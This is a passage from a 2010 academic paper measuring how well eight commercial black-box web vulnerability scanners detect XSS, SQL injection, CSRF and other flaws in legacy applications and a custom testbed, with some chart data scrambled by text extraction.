State of the Art: Automated Black-Box Web Application Vulnerability Testing
Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford University
Stanford, CA
{jbau, divijg}@stanford.edu, {elie, mitchell}@cs.stanford.edu
Abstract—Black-box web application vulnerability scanners
are automated tools that probe web applications for security
vulnerabilities. In order to assess the current state of the art, we
obtained access to eight leading tools and carried out a study
of: (i) the class of vulnerabilities tested by these scanners, (ii)
their effectiveness against target vulnerabilities, and (iii) the
relevance of the target vulnerabilities to vulnerabilities found
in the wild. To conduct our study we used a custom web
application vulnerable to known and projected vulnerabilities,
and previous versions of widely used web applications containing known vulnerabilities. Our results show the promise
and effectiveness of automated tools, as a group, and also
some limitations. In particular, “stored” forms of Cross Site
Scripting (XSS) and SQL Injection (SQLI) vulnerabilities are
not currently found by many tools. Because our goal is to
assess the potential of future research, not to evaluate specific
vendors, we do not report comparative data or make any
recommendations about purchase of specific tools.
Keywords-Web Application Security; Black Box Testing;
Vulnerability Detection; Security Standards Compliance;
I. INTRODUCTION
Black-box web application vulnerability scanners are automated tools that probe web applications for security vulnerabilities, without access to source code used to build the
applications. While there are intrinsic limitations of blackbox tools, in comparison with code walkthrough, automated
source code analysis tools, and procedures carried out by
red teams, automated black-box tools also have advantages.
Black-box scanners mimic external attacks from hackers,
provide cost-effective methods for detecting a range of important vulnerabilities, and may configure and test defenses
such as web application firewalls. Since the usefulness of
black-box web scanners is directly related to their ability
to detect vulnerabilities of interest to web developers, we
undertook a study to determine the effectiveness of leading
tools. Our goal in this paper is to report test results and
identify the strengths of current tools, their limitations, and
strategic directions for future research on web application
scanning methods. Because this is an anonymized conference submission, we note that the authors of this study are
university researchers.
Web application security vulnerabilities such as cross-site
scripting, SQL injection, and cross-site request forgeries are
acknowledged problems with thousands of vulnerabilities
reported each year. These vulnerabilities allow attackers to
perform malevolent actions that range from gaining unauthorized account access [1] to obtaining sensitive data such
as credit card numbers [2]. In the extreme case, these vulnerabilities may reveal the identities of intelligence personnel
[3]. Because of these risks, web application vulnerability
remediation has been integrated into the compliance process of major commercial and governmental standards, e.g.
the Payment Card Industry Data Security Standard (PCI
DSS), Health Insurance Portability and Accountability Act
(HIPAA), and the Sarbanes-Oxley Act. To meet these mandates, web application scanners that detect vulnerabilities,
offer remediation advice, and generate compliance reports.
Over the last few years, the web vulnerability scanner market
as become a very active commercial space, with, for example, more than 50 products approved for PCI compliance
[4].
This paper reports a study of current automated blackbox web application vulnerability scanners, with the aim of
providing the background needed to evaluate and identify
the potential value of future research in this area. To the
best of our knowledge this paper is the most comprehensive
research on any group of web scanners to date. Because we
were unable to find competitive open-source tools in this
area (see Section VII), we contacted the vendors of eight
well-known commercial vulnerabilities scanners and tested
their scanners against a common set of sample applications.
The eight scanners are listed in Table I. Our study aims to
answer these three questions:
1) What vulnerabilities are tested by the scanners?
2) How representative are the scanner tests of vulnerability populations in the wild?
3) How effective are the scanners?
Because our goal is to assess the potential impact of
future research, we report aggregate data about all scanners,
and some data indicating the performance of the bestperforming scanner on each of several measures. Because
this is not a commercial study or comparative evaluation of
individual scanners, we do not report comparative detection
data or provide recommendations of specific tools. No single
scanner is consistently top-ranked across all vulnerability
categories.
We now outline our study methodology and summarize
our most significant findings. We began by evaluating the
2010 IEEE Symposium on Security and Privacy
1081-6011/10 $26.00 © 2010 IEEE
DOI 10.1109/SP.2010.27
332set of vulnerabilities tested by the scanners. Since most
of the scanners provide visibility into the way that target
vulnerability categories are scanned, including details of
the distribution of their test vector sets by vulnerability
classification, we use this and other measures to compare the
scanner target vulnerability distribution with the distribution
of in-the-wild web application vulnerabilities. We mine the
latter from incidence rate data as recorded by VUPEN
security [5], an aggregator and validator of vulnerabilities
reported by various databases such as the National Vulnerability Database (NVD) provided by NIST [6]. Using
database results, we also compare the incidence rates of web
application vulnerability as a group against incidence rates
for system vulnerabilities (e.g. buffer overflows) as group.
In the first phase of our experiments, we evaluate scanner detection performance on established web applications,
using previous versions of Drupal, phpBB, and Wordpress,
released around January 2006, all of which include wellknown vulnerabilities. In the second phase of our experiments, we construct a custom testbed application containing
an extensive set of contemporary vulnerabilities in proportion with the vulnerability population in the wild. Our
testbed checks all of the vulnerabilities in the NIST Web
Application Scanner Functional Specification [7] and tests
37 of the 41 scanner vulnerability detection capabililities
in the Web Application Security Consortium [8] evaluation
guide for web application scanners. (See Section VII).
Our testbed application also measures scanner ability to
understand and crawl links written in various encodings and
content technologies.
We use our custom application to measure elapsed scanning time and scanner-generated network traffic, and most
importantly, we tested the scanners for vulnerability detection and false positive performance.
Our most significant findings include:
1) The vulnerabilities for which the scanners test most
extensively are, in order, Information Disclosure,
Cross Site Scripting (XSS), SQL Injection, and other
forms of Cross Channel Scripting (XCS). This testing
distribution is roughly consistent with the vulnerability
population in the wild.
2) Although many scanners are effective at following
links whose targets are textually present in served
pages, most are not effective at following links through
active content technologies such as Java applets, SilverLight, and Flash.
3) The scanners as a group are effective at detecting
well-known vulnerabilities. They performed capably
at detecting vulnerabilities already reported to VuPen
from historical application versions. Also, the scanners
detected basic “reflected” cross-site scripting well,
with an average detection rate of over 60%.
4) The scanner performed particularly poorly at detecting “stored” vulnerabilities. For example, no scanner
Table I
STUDIED VULNERABILITY SCANNERS
Company Product Version Scanning Profiles Used
Acunetix WVS 6.5 Default and Stored XSS
Cenzic HailStorm Pro 6.0 Best Practices, PCI
Infrastructure, and Session
HP WebInspect 8.0 All Checks
IBM Rational AppScan 7.9 Complete
McAfee McAfee SECURE Web Hack Simulation and DoS
N-Stalker QA Edition 7.0.0 Everything
Qualys QualysGuard PCI Web N/A
Rapid7 NeXpose 4.8.0 PCI
detected any of our constructed second-order SQLI
vulnerabilities, and the stored XSS detection rate was
only 15%. Other limitations are discussed further in
this paper.
Our analysis suggests room for improvement in detecting
vulnerabilities inserted in our testbed, and we propose potential areas of research in Section VIII. However, we have
made no attempt to measure the financial value of these tools
to potential users. Scanners performing as shown may have
significant value to customers, when used systematically as
part of an overall security program. In addition, we did not
quantify the relative importance of detecting specific vulnerabilities. In principle, a scanner with a lower detection rate
may be more useful if the smaller number of vulnerabilities
it detects are individually more important to customers.
Section II of this paper discusses the black box scanners
and their vulnerability test vectors. Section III establishes
the population of reported web vulnerabilities. Section IV
presents scanner results on Wordress, phpBB, and Drupal
versions released around January 2006. Section V discusses
testbed results by vulnerability category for the aggregated
scanner set and also false positives. Section VI contains
some remarks by scanner, on individual scanner performance
as well as user experience. Section VII discusses related
work and section VIII concludes by highlighting research
opportunities resultant from this work.
II. BLACK BOX SCANNERS
We begin by describing the general usage scenario and
software architecture of the black-box web vulnerability
scanners. We then discuss the vulnerability categories which
they aim to detect, including test vector statistics where
available. Table I lists the eight scanners incorporated in
our study, which include products from several of the
most-established security companies in the industry. All the
scanners in the study are approved for PCI Compliance
testing [4]. The prices of the scanners in our study range
from hundreds to tens-of-thousands of dollars. Given such
a wide price range and also variations in usability, potential
customers of the scanners would likely not make a purchase
decision on detection performance alone.
333XSS
SQLI
XCS
Session
CSRF
Configuration
Info leaks
0 10 20 30 40 50
Figure 1. Scanner Test Vector Percentage Distribution
A. Usage Scenario
To begin a scanning session using a typical scanner, the
user must enter the entry URL of the web application as
well as provide a single set of user login credentials for
this application. The user then must specify options for the
scanner’s page crawler, in order to maximize page scanning
coverage. Most scanners tested allow a “crawl-only” mode,
so that the user can verify that the provided login and the
crawler options are working as expected. After setting the
crawler, the user then specifies the the scanning profile, or
test vector set, to be used in the vulnerability detection
run, before launching the scan. All scanners can proceed
automatically with the scan after profile selection, and most
include interactive modes where the user may direct the
scanner to scan each page. In our testbed experiments,
we always set the scanner to run, in automated mode,
the most comprehensive set of tests available, to maximize
vulnerability detection capability.
B. Software Architecture Descriptions
We ran two of the tested scanners, McAfee and Qualys, as
remote services whereby the user configures the scanner via
a web-interface before launching the scan from a vendorrun server farm. The other six scanners were tested as
software packages running on a local computer, although
the NeXpose scanner runs as a network service accessed by
browser via an IP port (thus naturally supporting multiple
scanner instances run by one interface). All scanners, as
would be expected of black box web-application testers,
generate http requests as test vectors and analyze the http
response sent by the web server for vulnerabilities. All local
scanner engines seem to run in a single process, except for
the Cenzic scanner, which runs a separate browser process
that appears to actually render the http response in order to
find potential vulnerabilities therein.
Table II
CONSENSUS VULNERABILITY CLASSIFICATION ACROSS SCANNERS
Classification Example Vulnerability
Cross-Site Scripting (XSS) Cross-Site Scripting
SQL Injection (SQLI) SQL Injection
Cross Channel Scripting
Arbitrary File Upload
Remote File Inclusion
OS Command Injection
Code Injection
Session Management
Session Fixation
Session Prediction
Authentication Bypass
Cross-Site Request Forgery Cross Site Request Forgery
SSL/Server Configuration SSL Misconfiguration
Insecure HTTP Methods
Information Leakage
Insecure Temp File
Path Traversal
Source Code Disclosure
Error Message Disclosure
C. Vulnerability Categories Targeted by Scanners
As each scanner in our study is qualified for PCI compliance, they are mandated to test for each of the Open
Web Application Security Project (OWASP) Top Ten 2007
[9] vulnerability categories. We also examine the scanning
profile customization features of each scanner for further
insight into their target vulnerability categories. All scanners
except Rapid7 and Qualys allow views of the scanning
profile by target vulnerability category, which are often
direct from the OWASP Top Ten 2007 and 2010rc1, Web
Application Security Consortium (WASC) Threat Classification version 1 [10], or the Common Weakness Enumeration
(CWE) top 25 [11]. In fact, each of the six allow very
fine-grained test customization, resulting in a set of over
100 different targeted vulnerability categories, too numerous
to list here. However, when related vulnerability categories
were combined into more general classifications, we were
able to find a set of consensus classifications for which all
tools test. Table II presents this list of consensus classifications, along with some example vulnerabilities from each
classification. We have kept Cross-Site Scripting and SQL
Injection as their own vulnerability classifications due to
their preponderant rate of occurrence (supported by “in the
wild” data in the next section) and their targeting by all
scanners. The Cross Channel Scripting classification [12]
includes all vulnerabilities, including those listed in the
table, allowing the user to inject code “across a channel”
onto the web server that executes on the server or a client
browser, aside from XSS and SQLI.
D. Test Vector Statistics
We were able to obtain detailed enough test profile information for four scanners (McAfee, IBM, HP, and Acunetix)
to evaluate how many test vectors target each vulnerabilities
classification, a rough measure of how much “attention”
334scanner vendors devote to each classification. Figure 1 plots
the percentage of vectors targeting each classification aggregated over the four scanners. The results show that scanners
devote most testing to information leakage vulnerabilities,
followed by XSS and SQLI vulnerabilities.
III. VULNERABILITY POPULATION FROM
VUPEN-VERIFIED NVD
In order to evaluate how well the vulnerability categories
tested by the scanners represent the web application vulnerability population “in the wild”, we took all of the web vulnerability categories forming the consensus classifications
from Table II and performed queries against the VUPEN
Security Vulnerability Notification Service database for the
years 2005 through 2009. We chose this particular database
as our reference as it aggregates vulnerabilities, verifies them
through the generation of successful attack vectors, and
reports them to sources such as the Common Vulnerabilities
and Exposures (CVE) [13] feed of the National Vulnerability
Database.
We collected from the VUPEN database the relative
incidence rate trends of the web application vulnerability
classes, which are plotted in Figure 2. Figure 3 plots
incidences of web application vulnerabilities against incidences of system vulnerabilities, e.g. Buffer Overflow,
Integer Overflow, Format String, Memory Corruption, and
Race Conditions, again collected by us using data from
VUPEN.
Figure 2 demonstrates that Cross-Site Scripting, SQL
Injection, and other forms of Cross-Channel Scripting have
consistently counted as three of the top four reported web
application vulnerability classes, with Information Leak being the other top vulnerability. These are also the top four
vulnerability classes by scanner test vector count. Within
these four, scanner test vectors for Information Leak amount
to twice that of any other vulnerability class, but the Information Leak incidence rates in the wild are generally lower
than that of XSS, SQLI, and XCS. We speculate that perhaps
test vectors for detecting information leakage, which may
be as simple as checking for accessible common default
pathnames, are easier to create than other test types. Overall,
however, it does appear that the testing emphasis for blackbox scanners as a group is reasonably proportional to the
verified vulnerability population in the wild.
We believe that the increase in SSL vulnerabilities shown
in figure 2 does not indicate a need for increased blackbox scanning. A large number of SSL vulnerabilities were
reported in 2009, causing the upward trend in SSL incidences. However, these are actually certificate spoofing
vulnerabilities that allow a certificate issued for one domain
name, usually containing a null-character, to become valid
for another domain name [14], [15]. As this vulnerability is
caused by mistakes made by the certificate authority and the
client application (usually browser), it cannot be prevented
Table III
PREVIOUSLY-REPORTED VS SCANNER-FOUND VULNERABILITIES FOR
DRUPAL, PHPBB2, AND WORDPRESS
Category
Drupal phpBB2 Wordpress
4.7.0 2.0.19 1.5strayhorn
Known Found Known Found Known Found
XSS 6 2 5 2 13 7
SQLI 2 1 1 1 8 4
XCS 4 0 1 0 8 3
Session 5 4 4 4 6 5
CSRF 2 0 1 0 1 1
Info Leak 4 3 1 1 6 4
by the website operator and thus cannot be detected by web
application scanning. In effect, the number of SSL/Server
configuration vulnerabilities that web application scanners
may reasonably aim to detect does not appear to increase
with the increased SSL vulnerability incidence rate.
Finally, Figures 2 and 3 suggest that 2006 was a particularly high-incident year for web application vulnerabilities,
with incidents actually decreasing in subsequent years. (This
trend is also confirmed by searches in the CVE database.)
While it is impossible to be certain, evidence gathered during
the course of this study, including the effectiveness of the
scanners at detecting basic XSS and SQLI vulnerabilities,
suggests that the decrease may possibly be attributable to
headway made by the security community against these
vulnerabilities. Improved security, however, has been answered in turn by efforts to uncover more novel forms of
the vulnerabilities.
IV. SCANNER RESULTS ON COMMON WEB
APPLICATIONS
Having confirmed that the testing vector distribution of
black-box web vulnerability scanners as a group roughly
correlates with the vulnerability population trends in the
wild, we now examine whether the scanners are actually
successful at finding existent vulnerabilities. We ran all scanners on three popular web applications, Drupal, phpBB2, and
Wordpress, all with known vulnerabilities. We chose to scan
application versions released around January 2006, as this
was prior to the peak in vulnerability reports in 2006. While
these are field applications with some inherent uncertainty as
to their exact vulnerability content, the early release dates
mean these application versions are the most field-tested,
with most vulnerabilities likely to have been recorded by
VUPEN via the NVD.
Table III lists the specific application versions tested as
well as the number of known vulnerabilities, including those
reported by the VUPEN database for each of these versions.
For all applications, we installed only the default modules
and included no add-ons.
Table III also shows the number of vulnerabilities found
by any scanners in the group, out of the set of known
335Number of vulnerability
0
100
200
300
400
500
600
700
800
900
1000
2005 2006 2007 2008 2009
XSS
SQLi
XCS
Session
CSRF
SSL
Infomation Leak
Figure 2. Comparison of Web Application Vulnerability Classes in VUPEN Database
1186
2793
1528
996
1275
1095
2000
1951
1531
1647
Number of vulnerabilities
1000
2000
3000
2005 2006 2007 2008 2009
Web
System
Figure 3. Web Application Vulnerabilities versus System Vulnerabilities in VUPEN Database
vulnerabilities. As the table shows, the scanner in total did
a generally good job of detecting these previously known
vulnerabilities. They did particularly well in the Information
Disclosure and Session Management classifications, leading
to the hypothesis that effective test vectors are easier to add
for these categories than others. The scanners also did a
reasonable job of detecting XSS and SQLI vulnerabilities,
with about 50% detection rate for both. The low detection
rate in the CSRF classification may possibly be explained
by the small number of CSRF test vectors. Anecdotally,
one scanner vendor confirmed that they do not report CSRF
vulnerabilities due to the difficulty of determining which
forms in the application require protection from CSRF.
V. SCANNER RESULTS ON CUSTOM TESTBED
In addition to testing scanner detection performance on
established web applications, we also evaluated the scanners
in a controlled environment. We developed our own custom
testbed application containing hand-inserted vulnerabilities,
each of which have a proven attack pattern. We verified each
of the vulnerabilities present in this environment, allowing us
significantly smaller uncertainty in vulnerability content than
in the case of field-deployed applications. (The scanners as a
group did not uncover any unintended vulnerabilities in our
web application.) We plan to release this testbed publically.
For each vulnerability classification, we incorporated both
“textbook” instances and also forward-looking instances,
such as XSS with non-standard tags, for each vulnerability
classification. However, we kept the vulnerability content
of our testbed fairly proportional with the vulnerability
population in the wild.
Our testbed has around 50 unique URLs and around
3000 lines of code, installed on a Linux 2.6.18-128.1.6.el5
server running Apache 2.2.3, MySQL 5.0.45, and PHP 5.1.6.
PhpMyAdmin was also running on our server alongside
the testbed application, solely for administrative purposes;
we thus ignored any scanner results having to do with
phpMyAdmin.
The remainder of this section is devoted to scanner testbed
data. We begin by presenting the performance footprint of
each scanner on our testbed. Following this, we report page
coverage results, designed to test scanner understanding of
336241
109
87
66
138
168
473
118
Acunetix
Cenzic
HP
IBM
McAfee
N-Stalker
Qualys
Rapid7
0m 50m 100m150m200m250m300m350m400m450m500m
(a) Scanner Execution Time in Minutes
123
76
35
71
25
122
48
186
146
116
206
125
53
877
145
649
Acunetix
Cenzic
HP
IBM
McAfee
N-Stalker
Qualys
Rapid7
0 MB 100 MB 200 MB 300 MB 400 MB 500 MB 600 MB 700 MB 800 MB 900 MB
Data sent
Data received
(b) Scanner Bytes Sent and Received
Figure 4. Scanner Footprint
various content technologies. We then present vulnerability
detection results, first an overview and subsequently by
vulnerability classification, giving a brief overview of our
testbed design for each classification. Finally, we discuss
false positives, including experimentally designed “traps” for
false positives as well as scanner results.
A. Scanner Time and Network Footprint
Figures 4a and 4b respectively plot the time required to
scan the testbed application and the number of network bytes
sent/received by each scanner, as measured on the web server
by tcpdump. Scanning time ranged from 66 to 473 minutes,
while network traffic ranged from 80 MB to nearly 1 GB.
Perhaps surprisingly, the scanning time and network traffic statistics seem to be relatively independent of each
other, as exemplified by the Rapid7, Qualys, N-Stalker,
and McAfee results. It is interesting that the two remote
services, Qualys and McAfee, generated comparatively low
amounts of network traffic. Finally, we wish to note that
the footprint statistics are not indicative of vulnerability
detection performance.
B. Coverage Results
To experimentally evaluate site coverage, we wrote hyperlinks using the technology in each category shown in
figure 5 and embedded each landing page with tracker code
that measured whether the link was followed. For Java,
SilverLight, and Flash, the linked applet or movie is a
simple, bare shell containing only the hyperlink. We then
link to the technology page containing the link from the
application home page, which is written in regular php.
The link encoding category encompasses links written
in hexadecimal, decimal, octal, and html encodings, with
the landing page file named in regular ASCII. The “POST
link” test involves a link that only shows up when certain
selections are made on a POST form. The other technologies
are self explanatory. Figure 5 shows the experimental results,
where the measure is percentage of successful links crawled
over total existent links by technology category.
Figure 5 shows that the scanners as a group have fairly
low comprehension of active technologies such as Java
applets, SilverLight, and, surprisingly given its widespread
use, Flash. We speculate that some scanners only perform
textual analysis of http responses in order to collect URLs,
thus allowing them to perform decently on script-based
links, which are represented in text, but not allowing them
to follow links embedded in compiled objects such as Java
applets and Flash movies. This would also explain the better
coverage of SilverLight over Flash and Java, as SilverLight
is delivered in a text-based markup language. We also
see that the scanners could improve their understanding of
various link encodings.
C. Vulnerability Detection Results
1) Overall Results: Figure 6 presents by vulnerability
classification the vulnerability detection rate averaged over
all scanners. The detection rate is simply calculated as the
number of vulnerabilities found over the (known) number of
total vulnerabilities. Results for each vulnerability classifications, including an added malware detection classification,
are explained in detail in individual sub-sections to follow.
Each vulnerability classification sub-section describes the
testbed for the category, plots the average detection rate over
all scanners, and also plots anonymous individual scanner
results for the category sorted from best- to worst-performing
for that category.
The results show that the scanners as a group are fairly
effective at detecting basic “reflected” cross-site scripting
(XSS type 1), with a detection rate of over 60%. Also,
although not shown, basic forms of first-order SQL Injection
were detected by a majority of scanners. Unfortunately,
the overall results for the first-order SQL vulnerability
33779.16
50
37.5
12.5 12.5
100 100
53.12
50
100
87.5
62.5
75
%
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
110%
Javascript events
AJAX
Silver Light
Flash
Java Applets
PHP redirects
Meta-refresh tag
Link encoding
Dynamic javascript
Pop-up
Iframe
VBScript
POST link
Figure 5. Successful Link Traversals over Total Links by Technology Category, Averaged Over All Scanners.
62.5
15
11.25
20.4
15
21.4
0
26.5
32.5
31.2
0
XSS type 1
XSS type 2
XSS advance
XCS
CSRF
SQL 1st order
SQL 2nd order
Session
Config
Info leak
Malware
0%
10%
20%
30%
40%
50%
60%
Figure 6. Average Scanner Vulnerability Detection Rate By Category
classification were dragged down by poor scanner detection
of more complex forms of first-order SQL injection that use
different keywords. Aside from the XSS type 1 classification,
there were no other vulnerability classifications where the
scanners as a group detected more than 32.5% of the
vulnerabilities. In some cases, scanners were unable to detect
testbed vulnerabilities which were an exact match for a category listed in the scanning profile. We also note how poorly
the scanners performed at detecting “stored” vulnerabilities,
i.e. XSS type 2 and second-order SQL injection, and how
no scanner was able to detect the presence of malware. We
will discuss our thoughts on how to improve detection of
these under-performing categories in Section VIII.
2) Cross-Site Scripting: Due to the preponderance of
Cross-Site Scripting vulnerabilities in the wild, we divided
Cross-Site Scripting into three sub-classes: XSS type 1, XSS
type 2, and XSS advanced. XSS type 1 consists of textbook
examples of reflected XSS, performed via the